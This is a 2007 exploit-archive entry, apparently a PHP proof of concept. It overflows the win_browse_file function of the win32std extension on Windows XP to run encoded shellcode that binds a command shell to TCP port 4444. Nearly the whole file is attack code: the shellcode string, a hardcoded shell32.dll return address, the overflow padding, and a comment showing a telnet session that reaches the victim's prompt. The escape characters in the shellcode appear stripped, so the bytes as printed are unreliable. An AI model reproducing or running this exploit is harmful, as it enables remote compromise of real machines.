Home / exploits php523browse-overflow.txt
Posted on 24 August 2007
<?php /* Inphex 317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm. GET /script.php HTTP/1.1 telnet 192.168.2.32 4444 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:apache> 7ffdf020 7c911005 7c9110ed 00000001 00000000 shoutz go to Kevin Finisterre */ if(!function_exists('win_browse_file')) { die('win32std extension is not available'); } $shellcode= "x2bxc9xb1x51xbaxbbxb2xd5x31xdaxdaxd9x74x24xf4". "x58x31x50x0ex83xc0x04x03xebxb8x37xc4xf7xd7x5c". "x6axefxd1x5cx8ax10x41x28x19xcaxa6xa5xa7x2ex2c". "xc5x22x36x33xd9xa6x89x2bxaexe6x35x4dx5bx51xbe". "x79x10x63x2exb0xe6xfdx02x37x26x89x5dxf9x6dx7f". "x60x3bx9ax74x59xefx79x5dxe8xeax09xc2x36xf4xe6". "x9bxbdxfaxb3xe8x9ex1ex45x04x23x33xcex53x4fx6f". "xccx02x4cx5ex37xa0xd9xe2xf7xa2x9dxe8x7cxc4x01". "x5cx09x65x31xc0x66xe8x0fxf2x9axa4x70xdcx05x16". "xe8x89xfaxaax9cx3ex8exf8x03x95x8fx2dxd3xdex9d". "x32x18xb1xa2x1dx01xb8xb8xc4x3cx57x4ax0bx6bxc2". "x49xf4x43x7ax97x03x96xd6x70xebx8ex7ax2cx40x7d". "x2ex91x35xc2x83xeax6axa2x4bx04xd7x4cxdfxafx06". "x05xb7x0bxd2x55x8fx03x1cx43x65xbcxb3x3ex85x6c". "x5bx64xd4xa3x75x33xd8x6axd6xeexd9x43xb1xf5x6f". "xe2x0bxa2x90x3cxdbx18x3bx94x23x70x50x7ex3bx09". "x91x06x94x16xcbxacxe5x38x92x24x7exdex33xdax13". "x97x21x76xbcxfex80x4bxb5xe7xb9x17x4fx05x0cx58". "xbcx63x91x1ax6ex8dx2cxb7xe3xfcxcbxffxa8x55x80". "x68xddx57x64x7exdexd2xcfx80xf6x47x87x2cxa6x26". "x76xbbx49x99x29x6ex1bxe6x1axf8x36xc1x9ex37x1b". "x0ex76xadx63x0fx40xcdx4cx64xf8xcdxeexbex63xd1". "x27x6cx93xfdxa0x60xe1xfax6fxd3x09xd4x6fx03xf5". "xd9x8f"; $eip = "xDCx1Cx9Cx7C"; //shell32.dll win_browse_file( 1, NULL, str_repeat( "A", 260 )."".$eip."XXXXx20xf0xfdx7f".str_repeat("C",500).$shellcode.str_repeat("C",300), NULL, array( "*" => "*.*" ) ); ?>
